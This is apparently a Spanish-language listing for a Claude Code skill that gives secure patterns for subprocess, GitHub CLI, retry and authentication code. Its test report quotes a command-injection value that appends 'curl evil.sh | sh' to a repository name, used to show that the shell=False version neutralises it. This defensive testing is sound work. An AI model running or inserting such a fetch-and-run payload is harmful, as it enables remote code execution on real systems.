API Integration Patterns
Patrones seguros de subprocesos de API/CLI: sin shell=True, comandos en lista blanca, retroceso de reintentos, validación de tokens.
Probado · Funciona
Qué hace
Una skill de patrones de referencia que suministra patrones de código seguros para subprocesos, GitHub CLI, reintentos con retroceso, autenticación y limitación de velocidad cuando Claude escribe código de integración de API o CLI externa. Se activa ante palabras clave de subprocess/gh-cli/API-call/retry/auth y excluye explícitamente ediciones de funciones internas o solo de configuración.
Informe de la prueba
Prueba real CWE-78: el código de línea base usó shell=True con un nombre de repositorio f-string, permitiendo que un valor de repositorio manipulado añadiera 'curl evil.sh | sh'; la versión de skill con array argv + shell=False pasó la misma cadena maliciosa a través de gh como un argumento inerte. Concreto, no cosmético.
Probado el: 2026-07-15 · Claude Code 2.x (agent harness)
Instalación
git clone https://github.com/akaszubski/autonomous-dev cd autonomous-dev mkdir -p ~/.claude/skills cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns
Comandos y prompts de ejemplo
/api-integration-patternsPatrones seguros de subprocesos de API/CLI: sin shell=True, comandos en lista blanca, retroceso de reintentos, validación de tokens.
Los skills se activan con peticiones en lenguaje natural, sin comandos que memorizar. Tras instalarlo, prompts como estos lo activan (en inglés):
Write a Python function that lists GitHub issues via the gh CLIAdd retry logic with exponential backoff to my API client codeHelp me safely handle subprocess calls without shell injection risk